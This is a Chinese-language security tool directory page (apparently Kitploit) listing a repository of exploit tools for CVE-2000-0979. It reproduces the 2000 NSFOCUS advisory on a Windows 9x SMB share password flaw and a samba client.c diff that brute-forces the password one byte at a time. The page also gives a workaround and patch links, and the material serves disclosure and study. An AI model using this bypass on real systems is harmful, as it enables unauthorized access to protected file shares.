Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
工具/GitHubGitHub/z6543/cve-2000-0979
漏洞利用框架漏洞分析漏洞利用网络安全渗透测试
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

查看仓库
226年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2000-0979

CVE-2000-0979.rb 是针对 Windows 95 SMB 服务利用 CVE-2000-0979 的独立工具。

msf_2000_0979.rb 是 Metasploit 模块。你可以将其复制到 ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩

MSF module

更多文档即将推出!

原始公告

NSFOCUS Security Advisory(SA2000-05)

主题: Microsoft Windows 9x NETBIOS 密码验证漏洞

发布日期: 2000 年 8 月 24 日 更新日期: 2000 年 10 月 11 日

受影响系统

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

不受影响系统

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

影响

Microsoft Windows 9x NETBIOS 协议实现所采用的密码验证机制中存在一个漏洞。该漏洞将允许任何用户在未知道共享密码的情况下访问受密码保护的 Windows 9x 文件共享服务。

描述

你可以设置密码来保护 Microsoft Windows 9x 系统的共享资源。但在 Microsoft Windows 9x NETBIOS 协议实现所采用的密码验证机制中存在一个漏洞。验证密码时,密码的长度取决于客户端发送到服务器的数据长度。也就是说,如果客户端将密码长度设置为一个字节,并将包含明文密码的数据包发送给服务器,服务器只会将其与共享密码(明文)的第一个字节进行比较;如果一致,验证过程即告完成。攻击者只需猜测并尝试受害者的密码第一个字节即可。

Windows 9x 远程管理系统同样受到影响,因为它采用了相同的共享密码认证方法。

漏洞利用

以下是一个演示此漏洞的简单示例。获取 samba 源代码包并如下修改 source/client/client.c:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

       DEBUG(4,(" session setup ok\n"));

+/*
      if (!cli_send_tconX(c, share, "?????",
                           password, strlen(password)+1)) {
              DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
              cli_shutdown(c);
              return NULL;
      }
+*/
+
+      password[0] = 0;
+      c->sec_mode = 0;
+      do{
+
+        password[0]+=1;
+
+      }while(!cli_send_tconX(c, share, "?????", password, 1));

      DEBUG(4,(" tconx ok\n"));

临时解决方案

关闭 Microsoft 文件和打印机共享服务。

解决方案

Microsoft 已知悉此问题,并针对此缺陷发布了一份安全公告。

该公告发布于:

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

补丁可从以下位置获取:

. Microsoft Windows 95

补丁即将提供

. Microsoft Windows 98 和 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

免责声明

本信息由 NSFOCUS 按“原样”提供,不附带任何形式的担保。除适销性担保外,NSFOCUS 不承担任何明示或暗示的担保。在任何情况下,NSFOCUS 均不对任何损害负责,包括直接、间接、偶然、后果性损害、商业利润损失或特殊损害,即使 NSFOCUS 已被告知此类损害的可能性。分发或复制本信息时,不得以任何方式修改本公告。

©版权所有 1999-2000 NSFOCUS。保留所有权利。使用条款。

NSFOCUS 安全团队 [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

下载工具